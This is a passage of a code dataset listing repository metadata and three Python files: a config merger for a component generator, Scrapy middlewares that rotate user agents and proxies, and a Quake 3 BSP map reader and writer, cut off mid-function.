hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8baa0bbad2a459368cf5f2bc12134a0f82c3948a | 1,961 | py | Python | new_component/_config.py | iancleary/new-component | f287fb2afd34a5aa50e043c190bd35179e5816b9 | [
"MIT"
] | null | null | null | new_component/_config.py | iancleary/new-component | f287fb2afd34a5aa50e043c190bd35179e5816b9 | [
"MIT"
] | 4 | 2022-02-02T06:57:06.000Z | 2022-02-05T01:05:52.000Z | new_component/_config.py | iancleary/new-component | f287fb2afd34a5aa50e043c190bd35179e5816b9 | [
"MIT"
] | 1 | 2022-02-03T03:29:05.000Z | 2022-02-03T03:29:05.000Z | import json
from new_component._constants import (
DEFAULT_COMPONENTS_DIR,
DEFAULT_FILE_EXTENSION,
GLOBAL_CONFIG_FILE,
LOCAL_CONFIG_FILE,
)
def _load_config() -> dict:
    """
    Load config from global and local scopes, if they exist.

    Returns a dict with up to two keys, "local" and "global", each holding
    the parsed JSON content of the corresponding config file.
    """
    file_config = {}
    # Context managers guarantee the files are closed even if json.load raises.
    if LOCAL_CONFIG_FILE.exists():
        with open(LOCAL_CONFIG_FILE) as f:
            file_config["local"] = json.load(f)
    if GLOBAL_CONFIG_FILE.exists():
        with open(GLOBAL_CONFIG_FILE) as f:
            file_config["global"] = json.load(f)
    return file_config
def _merge_config(
file_config: dict, directory: str = None, extension: str = None
) -> dict:
"""
Merge config values, with command-line values overwriting local values,
and local values overwriting global ones.
"""
config = {}
# This should confirm keys match API
if "global" in file_config.keys():
config.update(file_config["global"])
# This should confirm keys match API
if "local" in file_config.keys():
config.update(file_config["local"])
# Merge directory config and parameter
if directory is not None:
config.update({"directory": directory})
elif "directory" in config.keys():
# directory configured via global or local config file
pass
else:
# no config nor option specified, use default
config.update({"directory": DEFAULT_COMPONENTS_DIR})
# Merge directory config and parameter
if extension is not None:
config.update({"extension": extension})
elif "extension" in config.keys():
# extension configured via global or local config file
pass
else:
# no config nor option specified, use default
config.update({"extension": DEFAULT_FILE_EXTENSION})
# DEBUG
# with open("./.new-component-merged-config.json", "w") as outfile:
# json.dump(config, outfile, indent=4)
return config
| 26.863014 | 75 | 0.650178 |
f32178d0c19a0d32978de362d5e6255491b0f42b | 5,052 | py | Python | shunqiwang/middlewares.py | JonnyLe/shunqiwang_by_scrapy | 174e3cf0afa4ee2e137b88b0a40877ad1e9f95cb | [
"Apache-2.0"
] | 4 | 2019-05-02T01:31:14.000Z | 2019-12-06T02:07:14.000Z | shunqiwang/middlewares.py | JonnyLe/shunqiwang_by_scrapy | 174e3cf0afa4ee2e137b88b0a40877ad1e9f95cb | [
"Apache-2.0"
] | null | null | null | shunqiwang/middlewares.py | JonnyLe/shunqiwang_by_scrapy | 174e3cf0afa4ee2e137b88b0a40877ad1e9f95cb | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
from shunqiwang import settings
import logging,random,base64
class ShunqiwangSpiderMiddleware(object):
    """Default spider middleware from the Scrapy project template.

    Every hook forwards data unchanged; see
    https://doc.scrapy.org/en/latest/topics/spider-middleware.html
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy; hook up the spider_opened signal.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        # Responses pass through untouched (None means "continue").
        return None

    def process_spider_output(self, response, result, spider):
        # Forward every Request/dict/Item produced by the spider as-is.
        yield from result

    def process_spider_exception(self, response, exception, spider):
        # No special handling: let other middlewares deal with it.
        pass

    def process_start_requests(self, start_requests, spider):
        # Start requests are forwarded unchanged (requests only, no items).
        yield from start_requests

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class ShunqiwangDownloaderMiddleware(object):
    """Default downloader middleware from the Scrapy project template.

    All hooks are pass-throughs; see
    https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy; hook up the spider_opened signal.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_request(self, request, spider):
        # None tells Scrapy to keep processing the request normally.
        return None

    def process_response(self, request, response, spider):
        # Hand the downloaded response back unchanged.
        return response

    def process_exception(self, request, exception, spider):
        # No recovery attempted; other middlewares may handle it.
        pass

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class ShunqiwangUserAgentMiddleware(object):
    """Downloader middleware that attaches a random User-Agent header.

    The agent string is picked from settings.USER_AGENT for every request.
    """

    logger = logging.getLogger(__name__)

    def process_request(self, request, spider):
        # Pick one agent string at random for this request.
        chosen = random.choice(settings.USER_AGENT)
        print('User-Agent:', chosen)
        # setdefault keeps an explicitly set header untouched.
        request.headers.setdefault('User-Agent', chosen)
        return None

    def process_response(self, request, response, spider):
        # Responses pass through unchanged.
        return response

    def process_exception(self, request, exception, spider):
        # Log the failure and hand the request back for a retry.
        self.logger.debug(exception)
        return request
class ShunqiwangProxyMiddleware(object):
    """Downloader middleware that routes requests through a random proxy.

    Proxies come from settings.PROXIES, a list of dicts with 'ip_port' and
    'user_password' keys; entries with a non-empty 'user_password' also get
    a Proxy-Authorization header.
    """

    logger = logging.getLogger(__name__)

    def process_request(self, request, spider):
        proxy = random.choice(settings.PROXIES)
        print('proxy:', proxy)
        if proxy['user_password'] == '':
            # Anonymous proxy: only the endpoint is needed.
            request.meta['proxy'] = 'https://' + proxy['ip_port']
            # request.meta['proxy'] = proxy['ip_port']
        else:
            # Bug fix: base64.encode() operates on file objects and raised
            # at runtime here; credentials must be base64-encoded bytes.
            base64_user_passwd = base64.b64encode(
                proxy['user_password'].encode()).decode()
            # Bug fix: the scheme keyword needs a trailing space
            # ("Basic <credentials>") per RFC 7617.
            request.headers['Proxy-Authorization'] = 'Basic ' + base64_user_passwd
            # request.meta['proxy'] = 'https://' + proxy['ip_port']
            request.meta['proxy'] = proxy['ip_port']
        return None

    def process_response(self, request, response, spider):
        # Responses pass through unchanged.
        return response

    def process_exception(self, request, exception, spider):
        # Log the failure and hand the request back for a retry.
        self.logger.debug(exception)
        return request
4b43c33eb40c771ba7d85025bfc42e91538dbbe9 | 28,100 | py | Python | Urcheon/Bsp.py | necessarily-equal/Urcheon | 1a6ce7acf5d0c9ac12dc3e51f0de9bf537c8d433 | [
"0BSD"
] | 5 | 2015-03-11T05:45:49.000Z | 2015-12-08T09:53:30.000Z | Urcheon/Bsp.py | necessarily-equal/Urcheon | 1a6ce7acf5d0c9ac12dc3e51f0de9bf537c8d433 | [
"0BSD"
] | 20 | 2015-03-09T01:16:36.000Z | 2017-02-13T09:51:02.000Z | Urcheon/Bsp.py | necessarily-equal/Urcheon | 1a6ce7acf5d0c9ac12dc3e51f0de9bf537c8d433 | [
"0BSD"
] | 1 | 2022-01-08T01:13:12.000Z | 2022-01-08T01:13:12.000Z | #! /usr/bin/env python3
#-*- coding: UTF-8 -*-
### Legal
#
# Author: Thomas DEBESSE <dev@illwieckz.net>
# License: ISC
#
from Urcheon import Map
from Urcheon import Ui
import __main__ as m
import argparse
import glob
import json
import logging
import os
import struct
import sys
from collections import OrderedDict
from logging import debug
from PIL import Image
class Lump():
	"""Base class for BSP lump parsers.

	Subclasses implement importLump()/exportLump() (binary form) and
	readFile()/readDir()/validateExtension() (bspdir form).
	"""
	# Parser description ({"lump_name_list", "lump_dict"}) for the BSP
	# format being read; assigned by Bsp before readBspDirLump() is called.
	bsp_parser_dict = None
	def readBspDirLump(self, dir_name, lump_name):
		"""Load this lump from a .bspdir directory.

		Looks for a single file named <lump_name>.<ext> inside dir_name and
		dispatches on the extension: ".bin" is imported as a raw blob, ".d"
		is read as a directory, anything else the subclass validates is read
		as a file. Errors out on ambiguous or unknown lump files.
		"""
		file_list = glob.glob(dir_name + os.path.sep + lump_name + os.path.extsep + "*")
		if len(file_list) > 1:
			# TODO: handle that
			Ui.error("more than one " + lump_name + " lump in bspdir")
		if len(file_list) == 0:
			# TODO: warning?
			return
		file_path = file_list[0]
		# Extension without the leading dot, and base name without extension.
		file_ext = os.path.splitext(file_path)[-1][1:]
		file_name = os.path.splitext(os.path.basename(file_path))[0]
		if file_ext == "bin":
			# Raw dump of a known lump: import the bytes verbatim.
			if file_name in self.bsp_parser_dict["lump_name_list"]:
				blob_file = open(file_path, "rb")
				self.importLump(blob_file.read())
				blob_file.close()
			else:
				Ui.error("unknown lump file: " + file_name)
		elif not self.validateExtension(file_ext):
			# Subclasses declare which extensions they can parse.
			Ui.error("unknown lump format: " + file_path)
		# NOTE(review): a ".bin" file also falls through to readFile() below,
		# importing the blob a second time — redundant but harmless for Blob
		# lumps; confirm this is intended.
		if file_ext == "d":
			# Directory-shaped lump (e.g. lightmaps).
			self.readDir(file_path)
		else:
			self.readFile(file_path)
class Blob(Lump):
	"""Opaque lump: raw bytes stored and written back verbatim."""
	# Raw bytes of the lump; None until imported.
	blob_stream = None
	def isEmpty(self):
		"""Return True when no blob has been loaded yet."""
		return not self.blob_stream
	def readFile(self, file_name):
		"""Import the lump from a binary file; always returns True."""
		# Context manager closes the file even if importLump raises.
		with open(file_name, "rb") as blob_file:
			self.importLump(blob_file.read())
		return True
	def writeFile(self, file_name):
		"""Dump the lump bytes to a binary file."""
		with open(file_name, "wb") as blob_file:
			blob_file.write(self.exportLump())
	def writeBspDirLump(self, dir_name, lump_name):
		"""Write the lump as <lump_name>.bin inside a .bspdir directory."""
		self.writeFile(dir_name + os.path.sep + lump_name + os.path.extsep + "bin")
	def importLump(self, blob):
		"""Store raw lump bytes."""
		self.blob_stream = blob
	def exportLump(self):
		"""Return the raw lump bytes."""
		return self.blob_stream
class Q3Entities(Lump):
	"""Entities lump: the NUL-terminated map entity string.

	Stored internally as a Map.Map object so keyword substitution and
	file-path lowercasing can be reused from the Map module.
	"""
	# Parsed entities as a Map.Map object; None until imported.
	entities_as_map = None
	def isEmpty(self):
		return not self.entities_as_map
	def validateExtension(self, file_ext):
		# Entities are stored as plain text in a bspdir.
		return file_ext == "txt"
	def readFile(self, file_name):
		"""Import the entities lump from a text file; always returns True."""
		entities_file = open(file_name, "rb")
		self.importLump(entities_file.read())
		entities_file.close()
		return True
	def writeFile(self, file_name):
		"""Write the entities string (without the trailing NUL) to a file."""
		entities_file = open(file_name, "wb")
		entities_file.write(self.exportLump().split(b'\0', 1)[0])
		entities_file.close()
		return True
	def writeBspDirLump(self, dir_name, lump_name):
		self.writeFile(dir_name + os.path.sep + lump_name + os.path.extsep + "txt")
	def printString(self):
		"""Print the raw entities string (NUL terminator stripped)."""
		print(bytes.decode(self.exportLump().split(b'\0', 1)[0]))
	def printList(self):
		"""Print one numbered line of key/value pairs per entity."""
		print("*** Entities")
		i = 0
		for entity in self.entities_as_map.entity_list:
			string = ""
			for thing in entity.thing_list:
				if isinstance(thing, Map.KeyValue):
					string += "\"" + thing.key + "\": \"" + thing.value + "\", "
			# [:-2] strips the trailing ", " separator.
			print(str(i) + ": [" + string[:-2] + "]")
			i += 1
		print("")
		return True
	def printSoundList(self):
		"""Print the values of all known sound keywords, numbered."""
		print("*** Entities")
		i = 0
		for entity in self.entities_as_map.entity_list:
			# NOTE(review): 'found' is assigned but never used.
			found = False
			for thing in entity.thing_list:
				if isinstance(thing, Map.KeyValue):
					for sound_keyword in Map.q3_sound_keyword_list:
						if thing.key.lower() == sound_keyword.lower():
							print(str(i) + ": " + thing.value + " [" + sound_keyword + "]")
							i += 1
		print("")
		return True
	def substituteKeywords(self, substitution):
		# Delegate to the Map object (per-game keyword renames).
		self.entities_as_map.substituteKeywords(substitution)
	def lowerCaseFilePaths(self):
		self.entities_as_map.lowerCaseFilePaths()
	def importLump(self, blob):
		"""Parse the NUL-terminated entities string into a Map object."""
		self.entity_list = []
		entities_bstring = blob.split(b'\0', 1)[0]
		self.entities_as_map = Map.Map()
		self.entities_as_map.numbering_enabled = False
		self.entities_as_map.readBlob(entities_bstring)
	def exportLump(self):
		"""Serialize the Map object back to a NUL-terminated byte string."""
		blob = b''
		blob += self.entities_as_map.exportFile().encode()
		blob += b'\0'
		return blob
class Q3Textures(Lump):
	"""Textures (shaders) lump: a list of {name, flags, contents} records.

	Binary layout per record: 64-byte NUL-padded name followed by two
	little-endian uint32 values (flags, contents), 72 bytes total.
	"""
	# List of {"name": str, "flags": int, "contents": int}; None until read.
	texture_list = None
	def int2bstr(self, i):
		"""Render an int as a 30-character zero-padded binary string."""
		return "{0:b}".format(i).zfill(30)
	def bstr2int(self, s):
		"""Parse a binary string produced by int2bstr()."""
		return int(s, 2)
	def isEmpty(self):
		return not self.texture_list
	def validateExtension(self, file_ext):
		# Textures are stored as CSV in a bspdir.
		return file_ext == "csv"
	def readFile(self, file_name):
		"""Load the texture list from a flags,contents,name CSV file."""
		# TODO: check that each line has at least 3 fields and allow
		# texture paths containing commas.
		self.texture_list = []
		with open(file_name, "rb") as textures_file:
			for texture_line_bstring in textures_file.read().split(b'\n'):
				if texture_line_bstring == b'':
					continue
				bstring_list = texture_line_bstring.split(b',')
				self.texture_list.append({
					"name": bytes.decode(bstring_list[2]),
					"flags": self.bstr2int(bstring_list[0]),
					"contents": self.bstr2int(bstring_list[1]),
				})
		return True
	def writeFile(self, file_name):
		"""Write the texture list as flags,contents,name CSV lines."""
		# Build all lines first, then join once instead of quadratic +=.
		line_list = [
			self.int2bstr(texture["flags"]) + ","
			+ self.int2bstr(texture["contents"]) + ","
			+ texture["name"] + "\n"
			for texture in self.texture_list
		]
		with open(file_name, "wb") as textures_file:
			textures_file.write("".join(line_list).encode())
	def writeBspDirLump(self, dir_name, lump_name):
		self.writeFile(dir_name + os.path.sep + lump_name + os.path.extsep + "csv")
	def printList(self):
		"""Print one numbered name [flags, contents] line per texture."""
		print("*** Textures:")
		for i, texture in enumerate(self.texture_list):
			print(str(i) + ": " + texture["name"] + " [" + self.int2bstr(texture["flags"]) + ", " + self.int2bstr(texture["contents"]) + "]")
		print("")
	def lowerCaseFilePaths(self):
		"""Lowercase every texture path in place."""
		for texture in self.texture_list:
			texture["name"] = texture["name"].lower()
	def importLump(self, blob):
		"""Parse the binary lump into the texture list.

		Per 72-byte record:
		- 64 bytes NUL-padded string name
		- 4 bytes integer flags
		- 4 bytes integer contents
		"""
		self.texture_list = []
		for offset in range(0, int(len(blob) / 72) * 72, 72):
			name = bytes.decode(blob[offset:offset + 64].split(b'\0', 1)[0])
			flags, contents = struct.unpack('<II', blob[offset + 64:offset + 72])
			self.texture_list.append({"name": name, "flags": flags, "contents": contents})
	def exportLump(self):
		"""Serialize the texture list back to the binary lump format."""
		blob = b''
		for texture in self.texture_list:
			# ljust pads the NUL-terminated name to the fixed 64 bytes,
			# replacing the previous byte-at-a-time padding loop that
			# shadowed the outer loop variable.
			# TODO: error out when the name exceeds 63 characters.
			name_bstring = (texture["name"].encode() + b'\0').ljust(64, b'\0')
			blob += name_bstring + struct.pack('<II', texture["flags"], texture["contents"])
		return blob
class Q3Lightmaps(Lump):
	"""Lightmaps lump: fixed-size 128x128 RGB images stored back to back.

	In a bspdir the lump is a directory of lm_NNNN.tga files.
	"""
	# NOTE(review): mutable class attribute; readDir()/importLump() rebind it
	# on the instance, so it is only shared before the first import.
	lightmap_list = []
	lightmap_colorspace = "RGB"
	lightmap_width = 128
	lightmap_height = 128
	lightmap_depth = 3
	# Derived sizes in bytes, computed from the dimensions above.
	lightmap_size = lightmap_width * lightmap_height * lightmap_depth
	lightmap_line_size = lightmap_width * lightmap_depth
	lightmap_resolution = str(lightmap_width) + "x" + str(lightmap_height) + "x" + str(lightmap_depth)
	def printList(self):
		"""Print one numbered [resolution, colorspace, size] line per lightmap."""
		print("*** Lightmaps:")
		for i in range(0, len(self.lightmap_list)):
			print("#" + str(i) + ": [" + self.lightmap_resolution + ", " + self.lightmap_colorspace + ", " + str(len(self.lightmap_list[i])) + "]")
		print("")
		return True
	def isEmpty(self):
		return not self.lightmap_list
	def validateExtension(self, file_ext):
		# Lightmaps are stored as a directory ("d") in a bspdir.
		return file_ext == "d"
	def readDir(self, dir_name):
		"""Load lm_* image files (any PIL-readable format) from a directory."""
		# TODO: check if a dir, perhaps argparse can do
		self.lightmap_list = []
		# sorted() keeps lightmap order stable (lm_0000, lm_0001, ...).
		file_list = sorted(glob.glob(dir_name + os.path.sep + "lm_*" + os.path.extsep + "*"))
		for file_name in file_list:
			debug("loading lightmap: " + file_name)
			image = Image.open(file_name)
			lightmap = image.convert(self.lightmap_colorspace).tobytes()
			lightmap_size = int(len(lightmap))
			if lightmap_size != self.lightmap_size:
				Ui.error("bad file " + file_name + ", must be a " + self.lightmap_resolution + " picture, found " + str(lightmap_size) + ", expected " + str(self.lightmap_size))
			self.lightmap_list.append(lightmap)
	def writeDir(self, dir_name):
		"""Write each lightmap as an uncompressed bottom-up BGR TGA file."""
		if not os.path.exists(dir_name):
			os.makedirs(dir_name, exist_ok=True)
		for i in range(0, len(self.lightmap_list)):
			file_name = "lm_" + str(i).zfill(4) + os.path.extsep + "tga"
			# TODO: os independent:
			file_path = dir_name + os.path.sep + file_name
			# TODO: check
			lightmap_file = open(file_path, "wb")
			# Hand-built TGA header:
			# 1: Identification field length (see later for my arbitrary 18 chars string, here 18, up to 255)
			# 1: No color map
			# 1: Type 2 (RGB)
			# 5: Color map spec (ignored)
			header = b'\x12\0\x02\0\0\0\0\0'
			# 2: Origin X
			# 2: Origin Y
			header += b'\0\0\0\0'
			# 2: Width
			# 2: Height
			header += self.lightmap_width.to_bytes(2, "little")
			header += self.lightmap_height.to_bytes(2, "little")
			# 1: Bits per pixels (24)
			header += (self.lightmap_depth * 8).to_bytes(1, "little")
			# 1: Attribute bits (0 for 24)
			header += b'\0'
			# The 18-byte identification field announced above.
			header += b'Granger loves you\0'
			raw = self.lightmap_list[i]
			data = b''
			# TGA rows are stored bottom-up: last line is first line.
			for j in range(0, self.lightmap_size, self.lightmap_line_size):
				line = raw[self.lightmap_size - self.lightmap_line_size - j : self.lightmap_size - j]
				# Swap each pixel: RGB → BGR
				for k in range(0, self.lightmap_line_size, self.lightmap_depth):
					data += line[k : k + self.lightmap_depth][::-1]
			debug("header length: " + str(len(header)))
			debug("data length: " + str(len(data)))
			blob = header + data
			lightmap_file.write(blob)
			lightmap_file.close()
	def writeBspDirLump(self, dir_name, lump_name):
		self.writeDir(dir_name + os.path.sep + lump_name + os.path.extsep + "d")
	def importLump(self, blob):
		"""Slice the binary lump into fixed-size lightmap byte strings."""
		self.lightmap_list = []
		lump_count = int(len(blob) / self.lightmap_size)
		for i in range(0, lump_count):
			self.lightmap_list.append(blob[i * self.lightmap_size : (i + 1) * self.lightmap_size])
		return True
	def exportLump(self):
		"""Concatenate all lightmaps back into one binary lump."""
		blob = b''
		# TODO: better
		for i in range(0, len(self.lightmap_list)):
			blob += self.lightmap_list[i]
		return blob
class QFLightmaps(Q3Lightmaps):
	"""QFusion (Warsow FBSP) lightmaps: same layout as Quake 3 but 512x512."""
	# NOTE(review): mutable class attribute, same pattern as Q3Lightmaps;
	# rebound on the instance by readDir()/importLump().
	lightmap_list = []
	lightmap_colorspace = "RGB"
	lightmap_width = 512
	lightmap_height = 512
	lightmap_depth = 3
	# Derived sizes in bytes, computed from the dimensions above.
	lightmap_size = lightmap_width * lightmap_height * lightmap_depth
	lightmap_line_size = lightmap_width * lightmap_depth
	lightmap_resolution = str(lightmap_width) + "x" + str(lightmap_height) + "x" + str(lightmap_depth)
class Bsp():
	"""Reader/writer for id Tech 3 style BSP files and .bspdir directories.

	Lump payloads are kept as raw bytes in self.lump_dict and parsed on
	demand by the per-format lump classes described in bsp_dict.
	"""
	def __init__(self, bsp_magic_number=None, bsp_version=None):
		"""Select the BSP format; defaults to Quake 3 (IBSP 46)."""
		self.bsp_file = None
		self.bsp_file_name = None
		# metadata for printing purpose
		self.lump_directory = {}
		self.sound_list = None
		# lumps are stored here
		self.lump_dict = {}
		if bsp_magic_number and bsp_version:
			# TODO: make user able to set it with command line option
			self.bsp_magic_number = bsp_magic_number
			self.bsp_version = bsp_version
		else:
			# default bsp format
			self.bsp_magic_number = "IBSP"
			self.bsp_version = 46
		self.bsp_parser_dict = bsp_dict[self.bsp_magic_number][self.bsp_version]
	def readFile(self, bsp_file_name):
		"""Read a whole .bsp file: detect magic/version, then load every lump."""
		# TODO: check
		self.bsp_file_name = bsp_file_name
		self.bsp_file = open(self.bsp_file_name, 'rb')
		# FIXME: check file length
		read_bsp_magic_number = self.bsp_file.read(4).decode()
		for bsp_magic_number in bsp_dict.keys():
			if bsp_magic_number == read_bsp_magic_number:
				self.bsp_magic_number = bsp_magic_number
				break
		else:
			self.bsp_magic_number = None
		if not self.bsp_magic_number:
			self.bsp_file.close()
			self.bsp_file = None
			Ui.error(": unknown BSP magic number " + str(read_bsp_magic_number))
		self.bsp_file.seek(len(self.bsp_magic_number))
		# FIXME: check file length
		read_bsp_version = struct.unpack('<I', self.bsp_file.read(4))[0]
		for bsp_version in bsp_dict[self.bsp_magic_number].keys():
			if bsp_version == read_bsp_version:
				self.bsp_version = bsp_version
				break
		if not self.bsp_version:
			self.bsp_file.close()
			self.bsp_file = None
			Ui.error(": unknown BSP version " + str(read_bsp_version))
		self.bsp_parser_dict = bsp_dict[self.bsp_magic_number][self.bsp_version]
		self.readLumpList()
		for lump_name in self.bsp_parser_dict["lump_name_list"]:
			self.readLump(lump_name)
		self.bsp_file.close()
	def readDir(self, dir_name):
		"""Read a .bspdir directory: bsp.json metadata plus one file per lump."""
		# TODO: check if a dir, perhaps argparse can do
		bsp_description_file_path = os.path.join(dir_name, "bsp.json")
		if os.path.isfile(bsp_description_file_path):
			bsp_description_file = open(bsp_description_file_path, "r")
			bsp_json_dict = json.loads(bsp_description_file.read())
			bsp_description_file.close()
			self.bsp_magic_number = bsp_json_dict["bsp_magic_number"]
			self.bsp_version = bsp_json_dict["bsp_version"]
		else:
			# backward compatibility with early bspdir
			self.bsp_magic_number = "IBSP"
			self.bsp_version = 46
		self.bsp_parser_dict = bsp_dict[self.bsp_magic_number][self.bsp_version]
		for lump_name in self.bsp_parser_dict["lump_name_list"]:
			file_list = glob.glob(dir_name + os.path.sep + lump_name + os.path.extsep + "*")
			if len(file_list) > 1:
				# TODO: handling
				Ui.error("more than one " + lump_name + " lump in bspdir")
			if len(file_list) == 0:
				# TODO: warning?
				continue
			file_path = file_list[0]
			file_ext = os.path.splitext(file_path)[-1][1:]
			file_name = os.path.splitext(os.path.basename(file_path))[0]
			# Delegate parsing to the per-lump class, then keep the binary form.
			lump = self.bsp_parser_dict["lump_dict"][lump_name]()
			lump.bsp_parser_dict = self.bsp_parser_dict
			lump.readBspDirLump(dir_name, lump_name)
			self.lump_dict[lump_name] = lump.exportLump()
			# Offsets/lengths are unknown until the .bsp file is written.
			self.lump_directory[lump_name] = {}
			self.lump_directory[lump_name]["offset"] = None
			self.lump_directory[lump_name]["length"] = None
	def printFileName(self):
		"""Print the name of the loaded .bsp file."""
		print("*** File:")
		print(self.bsp_file_name)
		print("")
	def substituteKeywords(self, substitution):
		"""Apply keyword substitution to the entities lump, in place."""
		for lump_name in ["entities"]:
			if lump_name in self.lump_dict:
				# Round-trip through the lump parser: import, rewrite, export.
				lump = self.bsp_parser_dict["lump_dict"][lump_name]()
				lump.importLump(self.lump_dict[lump_name])
				lump.substituteKeywords(substitution)
				self.lump_dict[lump_name] = lump.exportLump()
	def lowerCaseFilePaths(self):
		"""Lowercase file paths in the entities and textures lumps, in place."""
		for lump_name in ["entities", "textures"]:
			if lump_name in self.lump_dict:
				lump = self.bsp_parser_dict["lump_dict"][lump_name]()
				lump.importLump(self.lump_dict[lump_name])
				lump.lowerCaseFilePaths()
				self.lump_dict[lump_name] = lump.exportLump()
	def readLumpList(self):
		"""Read the lump directory (offset/length pairs) from the header."""
		self.lump_directory = {}
		# TODO: check
		larger_offset = 0
		ql_advertisements_offset = 0
		for lump_name in self.bsp_parser_dict["lump_name_list"]:
			# FIXME: q3 centric
			# 4 bytes string magic number (IBSP)
			# 4 bytes integer version
			# 4 bytes integer lump offset
			# 4 bytes integer lump size
			self.bsp_file.seek(8 + (self.bsp_parser_dict["lump_name_list"].index(lump_name) * 8))
			self.lump_directory[lump_name] = {}
			offset, length = struct.unpack('<II', self.bsp_file.read(8))
			# QuakeLive Hack, an extra advertisement lump is added
			# at the end of IBSP 47 but original IBSP 47 (RTCW) does
			# not have it.
			# It looks like there is no way to test its presence other
			# than testing if read value is garbage or not and praying
			# for not getting garbage value that would be coincidentally
			# equal to the largest offset encountered, basically pray for
			# map compilers to not write the first characters of the
			# optional custom string the way they form a number equal to
			# the largest offset of legit lumps.
			# Also, pray for advertised last lump length being properly
			# 4-bytes aligned.
			if lump_name == "advertisements":
				if offset != ql_advertisements_offset:
					offset, length = (larger_offset, 0)
			else:
				if offset > larger_offset:
					larger_offset = offset
					ql_advertisements_offset = offset + length
			self.lump_directory[lump_name]["offset"], self.lump_directory[lump_name]["length"] = (offset, length)
			self.lump_dict[lump_name] = None
	def printLumpList(self):
		"""Print each lump with its offset and length when known."""
		# TODO: check
		print("*** Lumps:")
		for i in range(0, len(self.bsp_parser_dict["lump_name_list"])):
			lump_name = self.bsp_parser_dict["lump_name_list"][i]
			if lump_name in self.lump_directory:
				if not self.lump_directory[lump_name]["offset"]:
					# bspdir, length is also unknown
					print(str(i) + ": " + lump_name )
				else:
					print(str(i) + ": " + lump_name + " [" + str(self.lump_directory[lump_name]["offset"]) + ", " + str(self.lump_directory[lump_name]["length"]) + "]")
		print("")
	def readLump(self, lump_name):
		"""Read one lump's raw bytes using the offsets from the header."""
		# TODO: check
		# 4 bytes string magic number (IBSP)
		# 4 bytes integer version
		# 4 bytes integer lump offset
		# 4 bytes integer lump size
		self.bsp_file.seek(8 + (self.bsp_parser_dict["lump_name_list"].index(lump_name) * 8))
		offset, length = struct.unpack('<II', self.bsp_file.read(8))
		self.bsp_file.seek(offset)
		self.lump_dict[lump_name] = self.bsp_file.read(length)
	def writeFile(self, bsp_file_name):
		"""Write the full .bsp file: header, lump directory, metadata, lumps."""
		bsp_file = open(bsp_file_name, "wb")
		# Must be a multiple of 4
		metadata_blob = b'Granger loves you!\0\0'
		lumps_blob = b''
		directory_blob = b''
		# FIXME: q3-centric
		# 4 bytes string magic number (IBSP)
		# 4 bytes integer version
		# 4 bytes integer lump offset per lump
		# 4 bytes integer lump size per lump
		# 17 lumps + 1 extra empty lump (Quake Live advertisements)
		lump_count = len(self.bsp_parser_dict["lump_name_list"])
		# Hack: if IBSP 46 (Quake 3), add extra empty lump because q3map2 loads
		# advertisements lump from Quake Live even if not there, mistakenly
		# computing lump offset from random data (usually from custom string).
		# This way we ensure q3map2 will not load garbage by mistake
		# and produced bsp are always fine even when read by broken tools.
		if self.bsp_magic_number == "IBSP" and self.bsp_version == 46:
			lump_count += 1
		lump_start = 8 + lump_count * 8 + len(metadata_blob)
		for lump_name in self.bsp_parser_dict["lump_name_list"]:
			if lump_name in self.lump_dict:
				lump_content = self.lump_dict[lump_name]
				lump_length = len(self.lump_dict[lump_name])
			else:
				lump_content = b""
				lump_length = 0
			print(str(self.bsp_parser_dict["lump_name_list"].index(lump_name)) + ": " + lump_name + " [" + str(lump_start) + ", " + str(lump_length) + "]")
			directory_blob += lump_start.to_bytes(4, "little")
			directory_blob += lump_length.to_bytes(4, "little")
			lump_start += lump_length
			lumps_blob += lump_content
			# Align lump to 4 bytes if not empty
			# For reference, q3map2 does not count these extra bytes in lump length
			# This happens for entities string for example
			if lump_length != 0 and lump_length % 4 != 0:
				for missing_byte in range(0, 4 - (lump_length % 4)):
					lumps_blob += b'\0'
					lump_start += 1
					# silence pylint on unused variable
					missing_byte
		# Hack: see above for more explanations,
		# if IBSP 46 (Quake 3), add extra empty lump because q3map2 loads
		# advertisements lump from Quake Live even if not there.
		if self.bsp_magic_number == "IBSP" and self.bsp_version == 46:
			directory_blob += lump_start.to_bytes(4, "little") + b"\0\0\0\0"
		blob = self.bsp_magic_number.encode()
		blob += self.bsp_version.to_bytes(4, "little")
		blob += directory_blob
		blob += metadata_blob
		blob += lumps_blob
		bsp_file.write(blob)
		bsp_file.close()
	def writeDir(self, dir_name):
		"""Write a .bspdir directory: one file per non-empty lump plus bsp.json."""
		if not os.path.exists(dir_name):
